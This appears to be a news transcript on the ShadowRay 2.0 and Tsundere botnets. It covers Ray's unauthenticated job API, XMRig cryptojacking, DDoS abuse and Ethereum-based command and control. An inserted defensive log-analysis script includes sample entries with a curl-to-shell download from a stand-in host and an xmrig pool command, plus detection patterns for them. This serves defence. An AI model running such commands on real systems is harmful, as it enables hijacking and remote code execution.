Cybersecurity Threats: Botnets Targeting Cryptocurrency Users
Full Transcript
The emergence of botnets like ShadowRay and Tsundere has raised significant concerns about cybersecurity threats targeting cryptocurrency users. ShadowRay 2.0, as reported by The Hacker News, exploits a critical flaw in the Ray open-source AI framework: a missing-authentication bug with a CVSS score of 9.8. The vulnerability allows attackers to take control of vulnerable instances and hijack their computing power for illicit cryptocurrency mining with XMRig. The botnet operates by submitting malicious jobs to the unauthenticated Ray Job Submission API on exposed dashboards, turning compromised Ray clusters into self-replicating cryptomining operations. Notably, over 230,500 Ray servers are publicly accessible, which presents a lucrative attack surface for cybercriminals. Oligo Security highlights that the campaign also weaponizes these clusters for denial-of-service attacks against rival mining pools, transforming the operation from mere cryptojacking into a multi-purpose botnet capable of launching DDoS attacks.
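A defender-side illustration of the behaviour described above, added here and not part of the original transcript or of any vendor's tooling: it runs simple detection logic over constructed Ray dashboard access-log lines, flagging job submissions from outside an allowed network and job entrypoints that look like a miner or a download-and-execute loader. The log format, the allowed network and the indicator list are assumptions for the example; the `/api/jobs` path is where Ray's dashboard serves its Job Submission API.

```python
import ipaddress
import re

# Constructed access-log format (an assumption for this example, not Ray's own
# log layout): client IP, quoted request line, status, and, for job
# submissions, the entrypoint string.
LOG_RE = re.compile(
    r'(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3})'
    r'(?: entrypoint="(?P<entrypoint>[^"]*)")?'
)
JOB_API_PREFIX = "/api/jobs"  # Ray's Job Submission API is served under this dashboard path
# Entrypoint fragments typical of miner droppers (constructed indicator list).
SUSPICIOUS_ENTRYPOINT = re.compile(
    r"xmrig|stratum\+tcp|(curl|wget)[^|]*\|\s*(ba)?sh|base64\s+-d", re.IGNORECASE
)
ALLOWED_NETS = [ipaddress.ip_network("10.0.0.0/8")]  # assumed internal range

SAMPLE_LOG = """\
10.0.0.5 "POST /api/jobs/" 200 entrypoint="python train.py --epochs 3"
203.0.113.7 "POST /api/jobs/" 200 entrypoint="curl -s http://example.invalid/x.sh | sh"
203.0.113.9 "GET /api/version" 200
10.0.0.8 "POST /api/jobs/" 200 entrypoint="./xmrig -o stratum+tcp://pool.example.invalid:3333"
"""


def analyze(log_text: str) -> list[tuple[str, str, str]]:
    """Return (client_ip, severity, reason) for each suspicious log line."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        ip, method, path = m["ip"], m["method"], m["path"]
        entrypoint = m["entrypoint"] or ""
        allowed = any(ipaddress.ip_address(ip) in net for net in ALLOWED_NETS)
        job_submit = method == "POST" and path.startswith(JOB_API_PREFIX)
        # A miner or download-and-execute entrypoint is suspicious from anywhere.
        if SUSPICIOUS_ENTRYPOINT.search(entrypoint):
            findings.append((ip, "high", "miner/loader pattern in job entrypoint"))
        # Any request from outside the allowlist means the dashboard is exposed;
        # an actual job submission from there is the ShadowRay pattern.
        if not allowed:
            reason = ("job submitted from outside allowed networks" if job_submit
                      else "dashboard reached from outside allowed networks")
            findings.append((ip, "high" if job_submit else "medium", reason))
    return findings
```

The entrypoint patterns are a starting point only; in practice the stronger control is not exposing the dashboard at all and keeping the Job Submission API behind authentication.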
Separately, the Tsundere botnet, also spotlighted by The Hacker News, targets Windows users and has been active since mid-2025. This botnet executes arbitrary JavaScript code retrieved from a command-and-control server and propagates through a variety of methods, including the use of a Remote Monitoring and Management tool to download compromised files. The malware disguises itself with names related to popular games, suggesting that it targets users searching for pirated content. Once installed, the botnet maintains persistence by writing to the registry so that it restarts on system login.
The Tsundere botnet further distinguishes itself by utilizing Ethereum-based infrastructure for its command-and-control operations. The botnet fetches details of its C2 server through the Ethereum blockchain, providing a resilient mechanism for the attackers to rotate their infrastructure. Kaspersky's analysis reveals that the botnet allows its operators to build new artifacts and manage administrative functions, indicating a sophisticated level of control over the infected systems. The presence of Russian language in the source code suggests that the threat actors behind Tsundere may be Russian-speaking, adding another layer of complexity to the attribution of this cyber threat.
In summary, both botnets represent an alarming trend in the cryptocurrency space, in which cybercriminals exploit vulnerabilities to target users and systems. The combination of cryptojacking with additional capabilities such as DDoS attacks raises concerns not only for individual investors but also for the broader integrity of the cryptocurrency ecosystem. Enhanced security measures are urgently needed to protect against these evolving threats, as evidenced by the ongoing exploitation of vulnerabilities in widely used frameworks and the clever methods attackers employ to distribute their malware.